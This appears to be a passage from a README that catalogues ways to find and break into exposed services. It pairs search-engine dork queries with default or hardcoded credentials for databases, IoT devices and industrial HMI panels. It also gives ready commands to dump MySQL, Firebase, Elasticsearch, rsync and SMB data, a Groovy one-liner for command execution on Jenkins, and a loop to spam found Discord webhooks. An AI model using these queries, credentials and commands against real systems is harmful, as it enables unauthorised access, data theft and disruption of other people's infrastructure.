123456"`](https://www.zoomeye.org/searchResult?q=%22password%5C%3A%20%3Cspan%20style%3D%5C%22color%5C%3Ared%5C%22%3E123456%3C%2Fspan%3E%22) 48 | # Cassandra exposed databases authfree 49 | Default credentials (if they really require one) are cassandra:cassandra 50 | ### Hunter query 51 | [`protocol="cassandra"`](https://hunter.how/list?searchValue=protocol%3D%22cassandra%22) 52 | ### Dumping all 53 | Use [cqldump](https://github.com/komodoooo/cqldump) 54 | # Deep sea electronics default credentials 55 | ### Credentials 56 | Admin Password1234 57 | ### FOFA queries 58 | [`title="DSE 855"`](https://fofa.info/result?qbase64=dGl0bGU9IkRTRSA4NTUi) _(known as CVE-2024-5947)_ 59 | 60 | [`header="DSE0890" || header="DSE0891" || header="DSE0892"`](https://fofa.info/result?qbase64=aGVhZGVyPSJEU0UwODkwIiB8fCBoZWFkZXI9IkRTRTA4OTEiIHx8IGhlYWRlcj0iRFNFMDg5MiI%3D) 61 | # Find exposed discord webhooks 62 | Simplest way to spam into a webhook in python: 63 | ```py 64 | while True: __import__("requests").post("", data={"content":"@here hey"}) 65 | ``` 66 | ### Zoomeye dork 67 | [`"https://discord.com/api/webhooks/"`](https://www.zoomeye.org/searchResult?q=%22https%5C%3A%2F%2Fdiscord.com%2Fapi%2Fwebhooks%2F%22) 68 | #### But... Can i automate this? 69 | The answer is obviously yes, i made [this](https://github.com/komodoooo/discord-stuff/blob/main/src/zw.py) script. 70 | # Firebase misconfiguration 71 | The code snippet used to connect to firebase is often leaved in the main html page of websites, and it looks like this: 72 | ```js 73 | var config = { 74 | apiKey: "3x4mpl3", 75 | authDomain: "example.firebaseapp.com", 76 | databaseURL: "https://example.firebaseio.com", 77 | projectId: "example", 78 | storageBucket: "example.appspot.com", 79 | messagingSenderId: "6969" 80 | }; 81 | firebase.initializeApp(config); 82 | ``` 83 | Just go to _**database url** + `/.json`_ to dump all 84 | ### FOFA query 85 | [`body="firebase.initializeApp(config);" && body="databaseURL"`](https://fofa.info/result?qbase64=Ym9keT0iZmlyZWJhc2UuaW5pdGlhbGl6ZUFwcChjb25maWcpOyIgJiYgYm9keT0iZGF0YWJhc2VVUkwi) 86 | # Elasticsearch misconfiguration 87 | ### View all indices 88 | Base URL + `/_cat/indices?v` 89 | ### View an index content 90 | Base URL + `//_search?pretty=true&size=9999` 91 | ### FOFA query 92 | [`protocol="elastic" && banner="200 OK"`](https://fofa.info/result?qbase64=cHJvdG9jb2w9ImVsYXN0aWMiICYmIGJhbm5lcj0iMjAwIE9LIiA%3D) 93 | # FTP servers with anonymous login allowed 94 | Username: _`anonymous`_ 95 | 96 | Password: _`guest`_ 97 | ### Shodan query 98 | [`port:21 "Login successful" "FTP server ready"`](https://www.shodan.io/search?query=port%3A21+%22Login+successful%22+%22FTP+server+ready%22) 99 | [`port:21 "Login successful"`](https://www.shodan.io/search?query=port%3A21+%22Login+successful%22) 100 | ## Find exposed ftp servers on google 101 | ### Google dork 102 | [`intitle:"index of" inurl:ftp`](https://www.google.com/search?q=intitle%3A%22index+of%22+inurl%3Aftp) 103 | # Fujitsu IP series hardcoded credentials 104 | 105 | Username: _`fedish264pro`_ **OR** _`fedish265pro`_ 106 | 107 | Password: _`h264pro@broadsight`_ **OR** _`h265pro@broadsight`_ 108 | ###### (Well known as CVE-2023-38433) 109 | ### FOFA query 110 | [`"Server: thttpd/2.25b 29dec2003" && "Content-Length: 1133"`](https://en.fofa.info/result?qbase64=IlNlcnZlcjogdGh0dHBkLzIuMjViIDI5ZGVjMjAwMyIgJiYgIkNvbnRlbnQtTGVuZ3RoOiAxMTMzIg%3D%3D) 111 | # Jenkins code execution 112 | Select _`Manage Jenkins` > `Console Script`_ (Generally **/script** or **/manage/script**) 113 | 114 | Groovy oneliner for injecting system commands: 115 | 116 | ```groovy 117 | println("".execute().text) 118 | ``` 119 | ### Zoomeye dork 120 | [`title:"Dashboard [Jenkins]"+"Manage jenkins"`](https://www.zoomeye.org/searchResult?q=title%3A%22Dashboard%20%5BJenkins%5D%22%2B%22Manage%20jenkins%22) 121 | # LG Signage default credentials 122 | ### Login 123 | Default password: _`00000000`_ 124 | ### Zoomeye dork 125 | [`iconhash:79487298 && title:"LG Signage"`](https://www.zoomeye.org/searchResult?q=iconhash%3A79487298%20title%3A%22LG%20Signage%22&t=all) 126 | # Redis auth free access 127 | ### Install [redis-cli](https://redis.io/docs/install/install-redis/) 128 | ### Connecting 129 | `redis-cli -h ` 130 | ### Shodan query 131 | [`product:redis "db0"`](https://www.shodan.io/search?query=product%3Aredis+%22db0%22) 132 | # LDAP anonymous binding allowed 133 | ### Dumping all 134 | [my gist](https://gist.github.com/komodoooo/66674ad269771db4681e5e4800d22956) 135 | #### Shodan & censys queries 136 | `"LDAP" "SupportedSASLMechanisms: ANONYMOUS"` 137 | `services.ldap.allows_anonymous_bind: true` 138 | # Rsync exposed files 139 | ### Install 140 | Use your own package manager 141 | ### List all files 142 | `rsync --list-only

::` 143 | ### Download all files in your current directory 144 | `rsync -avh

:: $(pwd)` 145 | ### Shodan base query (to customize) 146 | [`product:rsyncd`](https://www.shodan.io/search?query=product%3Arsyncd) 147 | # SIMATIC HMI_Panel default credentials 148 | ### Login 149 | Default username: _`Administrator`_ 150 | 151 | Default password: _`100`_ 152 | ### Google dork 153 | [`intitle:"Miniweb Start Page"`](https://www.google.com/search?q=intitle%3A%E2%80%9DMiniweb+Start+Page%E2%80%9D) 154 | # SMB server misconfiguration 155 | ### installing smbclient 156 | Debian: `apt install samba` 157 | 158 | Arch: `pacman -S smbclient` 159 | ### Enumerate shares 160 | `smbclient -N -L //{address}` 161 | ### login in to misconfigurated server 162 | `smbclient -N //{address}/{share}` 163 | ### Shodan query 164 | [`port:445 "Authentication: disabled" "Users"`](https://www.shodan.io/search?query=port%3A445+%22Authentication%3A+disabled%22+%22Users%22) 165 | # SQLite Web free panel 166 | Just search for auth-free dashboards 167 | #### Hunter query 168 | [`web.title="SQLite Web" and web.body!="

Login

"`](https://hunter.how/list?searchValue=web.title%3D%22SQLite%20Web%22%20and%20web.body%21%3D%22%3Ch3%3ELogin%3C%2Fh3%3E%22) 169 | # Vinchin default MySQL credentials 170 | Username: `vinchin` 171 | 172 | Password: `yunqi123456` 173 | ### Dump all databases with mysqldump 174 | `mysqldump -h -u vinchin -pyunqi123456 --all-databases --result-file=dump.sql` 175 | ###### (Well known as CVE-2024-22901) 176 | ### Hunter query 177 | [`web.title="Vinchin Backup & Recovery"`](https://hunter.how/list?searchValue=web.title%3D%22Vinchin%20Backup%20%26%20Recovery%22) 178 | # VNC Servers with auth disabled 179 | Download **[Vnc viewer](https://www.realvnc.com/en/connect/download/viewer/)** 180 | Insert the IP address and port (default is 5900) and connect, 181 | 182 | select ok when unencrypted connection warning appears. 183 | ### Shodan query 184 | [`hash:1569903015`](https://www.shodan.io/search?query=hash%3A1569903015) 185 | --------------------------------------------------------------------------------